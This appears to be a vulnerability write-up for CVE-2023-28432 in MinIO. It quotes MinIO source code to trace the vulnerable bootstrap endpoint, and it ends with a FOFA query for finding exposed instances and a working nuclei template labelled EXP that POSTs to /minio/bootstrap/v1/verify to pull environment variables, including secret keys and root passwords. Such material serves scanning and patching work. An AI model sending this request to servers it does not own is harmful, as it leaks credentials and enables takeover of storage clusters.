CVE-2023-28432

CVE-2023-28432 nuclei templates

Dec

Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.

vuln info

# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L197// Verify - fetches system server config.func (client *bootstrapRESTClient) Verify(ctx context.Context, srcCfg ServerSystemConfig) (err error) {if newObjectLayerFn() != nil {return nil}respBody, err := client.callWithContext(ctx, bootstrapRESTMethodVerify, nil, nil, -1)if err != nil {return}defer xhttp.DrainBody(respBody)recvCfg := ServerSystemConfig{}if err = json.NewDecoder(respBody).Decode(&recvCfg); err != nil {return err}return srcCfg.Diff(recvCfg)}# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L54const (bootstrapRESTVersion = "v1"bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersionbootstrapRESTPrefix = minioReservedBucketPath + "/bootstrap"bootstrapRESTPath = bootstrapRESTPrefix + bootstrapRESTVersionPrefix)const (bootstrapRESTMethodHealth = "/health"bootstrapRESTMethodVerify = "/verify")// To abstract a node over network.type bootstrapRESTServer struct{}// ServerSystemConfig - captures information about server configuration.type ServerSystemConfig struct {MinioEndpoints EndpointServerPoolsMinioEnv map[string]string}# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L149func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {ctx := newContext(r, w, "VerifyHandler")if err := storageServerRequestValidate(r); err != nil {b.writeErrorResponse(w, err)return}cfg := getServerSystemCfg()logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))}// registerBootstrapRESTHandlers - register bootstrap rest router.func registerBootstrapRESTHandlers(router *mux.Router) {server := &bootstrapRESTServer{}subrouter := router.PathPrefix(bootstrapRESTPrefix).Subrouter()subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodHealth).HandlerFunc(httpTraceHdrs(server.HealthHandler))subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify).HandlerFunc(httpTraceHdrs(server.VerifyHandler))}# https://github.com/minio/minio/blob/master/cmd/object-api-utils.go#L210// SlashSeparator - slash separator.const SlashSeparator = "/"https://github.com/minio/minio/blob/master/cmd/generic-handlers.go#L138const (minioReservedBucket = "minio"minioReservedBucketPath = SlashSeparator + minioReservedBucketminioReservedBucketPathWithSlash = SlashSeparator + minioReservedBucket + SlashSeparatorSlashSeparator = "/"minioReservedBucketPath = SlashSeparator + minioReservedBucket ==> /miniobootstrapRESTPrefix = minioReservedBucketPath + "/bootstrap" ==> /minio/bootstrap/bootstrapRESTVersion = "v1"bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion ==> /v1bootstrapRESTMethodVerify = "/verify"subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify) ==> /v1/verify/final path:/minio/bootstrap/v1/verify/

fofa

app="minio"

EXP

id: CVE-2023-28432info: name: Minio post policy request security bypass author: Mr-xn severity: high description: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. reference: - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q - https://github.com/minio/minio/pull/16853/files - https://github.com/golang/vulndb/issues/1667 - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-28432 cwe-id: CWE-200 tags: cve,cve2023,requests: - raw: - |+ POST /minio/bootstrap/v1/verify HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word part: body words: - '"MinioEndpoints"' - type: word part: header words: - 'Content-Type: text/plain' - type: status status: - 200